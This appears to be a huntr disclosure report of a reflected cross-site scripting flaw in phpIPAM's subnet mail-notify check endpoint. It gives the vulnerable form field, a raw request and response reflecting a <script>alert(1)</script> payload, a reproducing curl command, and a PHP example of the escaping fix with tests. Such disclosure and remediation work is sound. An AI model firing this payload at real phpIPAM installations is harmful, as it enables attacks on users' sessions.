huntr report D280AE81-A1C9-4A50-9AA4-F98F1F9FD2C0
Dec 08, 2022 - 3:56 a.m.

Cross Site Scripting (XSS) Reflected

2022-12-08 03:56:23
z3n70
www.huntr.dev

Tags: reflected cross-site scripting, http request, http response, payload exploitation, curl request, phpipam, vulnerability detection

EPSS: 0.001
Percentile: 30.7%

Description

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Proof of Concept

https://github.com/phpipam/phpipam/blob/master/app/subnets/mail-notify-subnet.php

Look at lines 94-95, where the "recipients" parameter is not validated; I exploited the XSS with the payload <script>alert(1)</script>

91 <tr>
92		<th><?php print _('Recipients'); ?></th>
93		<td>
94			<input type="text" class='form-control input-sm pull-left' name="recipients" style="width:400px;margin-right:5px;">
95			<i></i>
96		</td>
97	</tr>

//request

POST /phpipam/app/subnets/mail-notify-subnet-check.php HTTP/1.1
Host: 192.168.1.15
Content-Length: 233
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.15
Referer: http://192.168.1.15/phpipam/index.php?page=subnets&section=1&subnetId=3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,id;q=0.8
Cookie: search_parameters=%7B%22addresses%22%3A%22off%22%2C%22subnets%22%3A%22off%22%2C%22vlans%22%3A%22off%22%2C%22vrf%22%3A%22off%22%2C%22pstn%22%3A%22off%22%2C%22circuits%22%3A%22off%22%2C%22customers%22%3A%22off%22%7D; table-page-size=50; phpipam=nud7ajr1q60hh5vldp4n619m50
Connection: close

recipients=%3Cscript%3Ealert(1)%3C%2Fscript%3E&subject=Subnet+details+%3A%3A+10.10.1.0%2F24&content=%E2%80%A2+Subnet%3A+%09%09+10.10.1.0%2F24%0D%0A%E2%80%A2+Description%3A%09%09+Customer+1&csrf_cookie=JgdkDHJcdNgm9oIwbzai9zXWvMahk4vZ

//response

HTTP/1.1 200 OK
Date: Thu, 08 Dec 2022 03:42:38 GMT
Server: Apache/2.4.52 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: phpipam=nud7ajr1q60hh5vldp4n619m50; expires=Fri, 09 Dec 2022 03:42:38 +0000; Max-Age=86400; path=/; SameSite=Lax; HttpOnly;
Vary: Accept-Encoding
Content-Length: 87
Connection: close
Content-Type: text/html; charset=UTF-8

<div>Invalid email address - <script>alert(1)</script></div>
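The response above shows the root cause: the check endpoint rejects the recipient as an invalid address and then echoes the rejected value into the error message without encoding it for HTML. The following is an added illustration written for this report, not phpIPAM's own code; the function names, the comma-separated recipient format and the plain <div> wrapper are assumptions. It places the unsafe construction next to the hardened one and ends with a regression check a project could keep in its test suite.

```php
<?php
// Added illustration, not phpIPAM's code. Function names, the
// comma-separated recipient format and the <div> wrapper are assumptions.

// Unsafe pattern: the rejected value is concatenated straight into HTML, so
// a recipient of "<script>alert(1)</script>" is returned as live markup.
function check_recipients_unsafe(string $recipients): string
{
    foreach (explode(',', $recipients) as $r) {
        $r = trim($r);
        if (filter_var($r, FILTER_VALIDATE_EMAIL) === false) {
            return '<div>Invalid email address - ' . $r . '</div>';
        }
    }
    return '<div>Recipients OK</div>';
}

// Hardened pattern: validation alone does not help, because it is the
// failure path that reflects the input. Escape the value for the HTML body
// context it lands in, using the charset the response declares
// (text/html; charset=UTF-8). ENT_QUOTES also covers attribute contexts.
function check_recipients_safe(string $recipients): string
{
    foreach (explode(',', $recipients) as $r) {
        $r = trim($r);
        if (filter_var($r, FILTER_VALIDATE_EMAIL) === false) {
            $escaped = htmlspecialchars($r, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
            return '<div>Invalid email address - ' . $escaped . '</div>';
        }
    }
    return '<div>Recipients OK</div>';
}

// Constructed sample input mirroring the decoded POST body from the report.
$sample = '<script>alert(1)</script>';

echo check_recipients_unsafe($sample), PHP_EOL;
echo check_recipients_safe($sample), PHP_EOL;

// Regression check: the escaped response must not contain a raw tag, and a
// well-formed address must still pass validation.
assert(strpos(check_recipients_safe($sample), '<script') === false);
assert(check_recipients_safe('admin@example.com') === '<div>Recipients OK</div>');
```

Run it with `php example.php`; the first line printed is the reflected markup, the second is the same message with the angle brackets turned into entities. The fix is output encoding at the point where untrusted data meets the HTML response, not stricter input validation: the error path by design has to show the user what was rejected.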

//POC in CURL

curl -i -s -k -X $'POST' \
    -H $'Host: 192.168.1.15' -H $'Content-Length: 233' -H $'Accept: */*' -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: http://192.168.1.15' -H $'Referer: http://192.168.1.15/phpipam/index.php?page=subnets&section=1&subnetId=3' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,id;q=0.8' -H $'Connection: close' \
    -b $'search_parameters=%7B%22addresses%22%3A%22off%22%2C%22subnets%22%3A%22off%22%2C%22vlans%22%3A%22off%22%2C%22vrf%22%3A%22off%22%2C%22pstn%22%3A%22off%22%2C%22circuits%22%3A%22off%22%2C%22customers%22%3A%22off%22%7D; table-page-size=50; phpipam=nud7ajr1q60hh5vldp4n619m50' \
    --data-binary $'recipients=%3Cscript%3Ealert(1)%3C%2Fscript%3E&subject=Subnet+details+%3A%3A+10.10.1.0%2F24&content=%E2%80%A2+Subnet%3A+%09%09+10.10.1.0%2F24%0D%0A%E2%80%A2+Description%3A%09%09+Customer+1&csrf_cookie=JgdkDHJcdNgm9oIwbzai9zXWvMahk4vZ' \
    $'http://192.168.1.15/phpipam/app/subnets/mail-notify-subnet-check.php'
